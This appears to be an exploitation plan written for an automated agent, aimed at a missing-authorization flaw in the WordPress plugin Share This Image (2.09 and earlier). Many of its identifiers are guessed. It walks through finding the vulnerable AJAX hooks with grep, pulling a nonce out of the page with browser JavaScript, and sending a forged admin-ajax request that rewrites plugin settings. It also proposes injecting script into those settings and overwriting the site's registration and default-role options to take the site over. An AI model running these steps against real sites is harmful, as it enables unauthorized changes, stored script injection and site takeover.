Share This Image <= 2.09 - Missing Authorization

As source files for the version <= 2.09 are not provided, this research plan is based on the vulnerability description (Missing Authorization) and common patterns found in the Share This Image plugin. All identifiers flagged with (inferred) must be verified by the automated agent using the provided grep commands.

---

1. Vulnerability Summary

The Share This Image plugin for WordPress (up to version 2.09) fails to implement proper capability checks (authorization) on one or more of its AJAX handlers. While the plugin may implement CSRF protection (nonces), it allows any user (including unauthenticated users via wp_ajax_nopriv_ hooks) to execute functions originally intended for administrators. This typically results in the ability to modify plugin settings or manipulate post metadata.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action (inferred): sti_save_settings or sti_update_options. (The agent must search for add_action( 'wp_ajax_nopriv_sti_... or add_action( 'wp_ajax_sti_...).
• Parameter: Usually a settings or options array, or individual key-value pairs passed via $_POST.
• Authentication: Unauthenticated (if wp_ajax_nopriv_ is used) or Subscriber-level.
• Preconditions: A valid WordPress nonce for the specific action may be required.

3. Code Flow

1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with the action parameter set to the vulnerable hook (e.g., sti_save_settings).
2. Hook Registration: The plugin registers the action using add_action( 'wp_ajax_nopriv_sti_save_settings', '...' ) and add_action( 'wp_ajax_sti_save_settings', '...' ).
3. Vulnerable Callback: The callback function (e.g., save_settings_callback) is invoked.
4. Authorization Failure: The function lacks a call to current_user_can( 'manage_options' ).
5. Sink: The function directly calls update_option( 'sti_settings', ... ) or update_post_meta() based on the values in $_POST.

4. Nonce Acquisition Strategy

If the AJAX handler uses check_ajax_referer or wp_verify_nonce, the nonce must be extracted from the frontend.

1. Identify Nonce Action & Variable:
   Search for wp_localize_script in the plugin files to find the JS object containing the nonce.

   • Command: grep -r "wp_localize_script" /var/www/html/wp-content/plugins/share-this-image/
   • Common Variable (inferred): sti_vars or sti_ajax_obj.
   • Common Nonce Key (inferred): nonce.

2. Locate Triggering Shortcode:
   Identify the shortcode that enqueues the plugin's scripts.

   • Command: grep -rn "add_shortcode" /var/www/html/wp-content/plugins/share-this-image/
   • Inferred Shortcode: [share-this-image] (if any). If no shortcode exists, the scripts might load on any page with images.

3. Extract Nonce via Browser:

   • Create a test page: wp post create --post_type=page --post_status=publish --post_title="Exploit" --post_content='[share-this-image]'
   • Navigate to the page using browser_navigate.
   • Execute JS to retrieve the nonce: browser_eval("window.sti_vars?.nonce") (Verify variable name via grep first).

5. Exploitation Strategy

Once the action name and nonce are confirmed, perform the following:

Target Action: sti_save_settings (inferred)
Payload Example: Modifying the plugin settings to inject a script into the "Custom CSS" or "Footer" setting (if available), or disabling security features.

HTTP Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=sti_save_settings&nonce=[EXTRACTED_NONCE]&settings[some_option]=attacker_value

Steps for the Agent:

1. Search for AJAX actions: grep -r "wp_ajax" .
2. Inspect the callback function for the absence of current_user_can.
3. Find where the nonce is generated: grep -r "wp_create_nonce" .
4. Generate and extract the nonce using the Nonce Acquisition Strategy above.
5. Send the http_request with the forged settings payload.

6. Test Data Setup

1. Plugin Activation: wp plugin activate share-this-image
2. Configuration: Ensure the plugin is configured with default settings.
3. Public Content: Create a post with an image to ensure the plugin's JS enqueues:
   wp post create --post_type=post --post_status=publish --post_content='<img src="https://example.com/test.jpg" class="share-this-image">'

7. Expected Results

• Response: The server returns a 200 OK or a JSON success message (e.g., {"success":true}).
• State Change: The plugin's options in the wp_options table are updated to the values provided in the payload.

8. Verification Steps

After the exploit attempt, verify the change via WP-CLI:

• Check the plugin options: wp option get sti_settings (inferred option name).
• Confirm the attacker_value is present in the output.

9. Alternative Approaches

• Post Meta Manipulation: If the AJAX action targets sti_update_post_meta (inferred), try to modify metadata for a sensitive post.
• Generic Settings Update: Some plugins use a generic update function. Check if $_POST['option_name'] is passed directly to update_option(), which could lead to a full site takeover if users_can_register or default_role is overwritten.

Grep commands to run immediately:

# Find AJAX actions
grep -r "wp_ajax" /var/www/html/wp-content/plugins/share-this-image/

# Look for settings/options update sinks
grep -r "update_option" /var/www/html/wp-content/plugins/share-this-image/

# Look for capability checks (to find what's missing)
grep -r "current_user_can" /var/www/html/wp-content/plugins/share-this-image/